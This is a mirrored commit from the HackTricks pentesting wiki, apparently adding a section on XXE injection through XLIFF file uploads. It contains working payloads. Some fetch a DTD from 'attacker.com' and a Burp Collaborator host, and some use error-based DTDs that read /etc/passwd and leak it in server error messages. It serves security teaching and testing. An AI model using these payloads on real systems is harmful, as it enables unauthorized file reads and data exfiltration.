mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-15 01:17:36 +00:00
GitBook: [master] one page modified
This commit is contained in:
CPol
gitbook-bot
parent
eba0ef4af8
commit
7a32414356
1 changed files with 75 additions and 0 deletions
|
|
@ -515,6 +515,81 @@ You can use the \[**"Encode Recipe**" of cyberchef here \]\([https://gchq.github
|
|||
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
|
||||
```
|
||||
|
||||
## XLIFF - XXE
|
||||
|
||||
This section was taken from [https://pwn.vg/articles/2021-06/local-file-read-via-error-based-xxe](https://pwn.vg/articles/2021-06/local-file-read-via-error-based-xxe)
|
||||
According to the [Wikipedia](https://en.wikipedia.org/wiki/XLIFF):
|
||||
|
||||
> XLIFF \(XML Localization Interchange File Format\) is an XML-based bitext format created to standardize the way localizable data are passed between and among tools during a localization process and a common format for CAT tool exchange.
|
||||
|
||||
### Blind request
|
||||
|
||||
```markup
|
||||
------WebKitFormBoundaryqBdAsEtYaBjTArl3
|
||||
Content-Disposition: form-data; name="file"; filename="xxe.xliff"
|
||||
Content-Type: application/x-xliff+xml
|
||||
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<!DOCTYPE XXE [
|
||||
<!ENTITY % remote SYSTEM "http://redacted.burpcollaborator.net/?xxe_test"> %remote; ]>
|
||||
<xliff srcLang="en" trgLang="ms-MY" version="2.0"></xliff>
|
||||
------WebKitFormBoundaryqBdAsEtYaBjTArl3--
|
||||
```
|
||||
|
||||
The server response with an error:
|
||||
|
||||
```javascript
|
||||
{"status":500,"error":"Internal Server Error","message":"Error systemId: http://redacted.burpcollaborator.net/?xxe_test; The markup declarations contained or pointed to by the document type declaration must be well-formed."}
|
||||
```
|
||||
|
||||
But we got a hit on Burp Collaborator.
|
||||
|
||||
### Exfiltrating Data via Out of Band
|
||||
|
||||
```markup
|
||||
------WebKitFormBoundaryqBdAsEtYaBjTArl3
|
||||
Content-Disposition: form-data; name="file"; filename="xxe.xliff"
|
||||
Content-Type: application/x-xliff+xml
|
||||
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<!DOCTYPE XXE [
|
||||
<!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd"> %remote; ]>
|
||||
<xliff srcLang="en" trgLang="ms-MY" version="2.0"></xliff>
|
||||
------WebKitFormBoundaryqBdAsEtYaBjTArl3--
|
||||
```
|
||||
|
||||
Based on the displayed User Agent returned by burp collaborator, it appears that it is using **Java 1.8**. One of the problems when exploiting XXE on this version of Java is **we’re unable to obtain the files containing a `New Line`** such as `/etc/passwd` using the Out of Band technique.
|
||||
|
||||
### Exfiltrating Data via Error Based
|
||||
|
||||
DTD File:
|
||||
|
||||
```markup
|
||||
<!ENTITY % data SYSTEM "file:///etc/passwd">
|
||||
<!ENTITY % foo "<!ENTITY % xxe SYSTEM 'file:///nofile/'>">
|
||||
%foo;
|
||||
%xxe;
|
||||
```
|
||||
|
||||
Server Response:
|
||||
|
||||
```javascript
|
||||
{"status":500,"error":"Internal Server Error","message":"IO error.\nReason: /nofile (No such file or directory)"}
|
||||
```
|
||||
|
||||
Great! The `non-exist` file is reflected in the Error messages. Next is adding the File Content.
|
||||
|
||||
DTD File:
|
||||
|
||||
```markup
|
||||
<!ENTITY % data SYSTEM "file:///etc/passwd">
|
||||
<!ENTITY % foo "<!ENTITY % xxe SYSTEM 'file:///nofile/%data;'>">
|
||||
%foo;
|
||||
%xxe;
|
||||
```
|
||||
|
||||
And the content of the file was successfully **printed in the output of the error sent via HTTP**.
|
||||
|
||||
## RSS - XEE
|
||||
|
||||
Valid XML with RSS format to exploit an XXE vulnerability.
|
||||
|
|
|
|||
Loading…
Reference in a new issue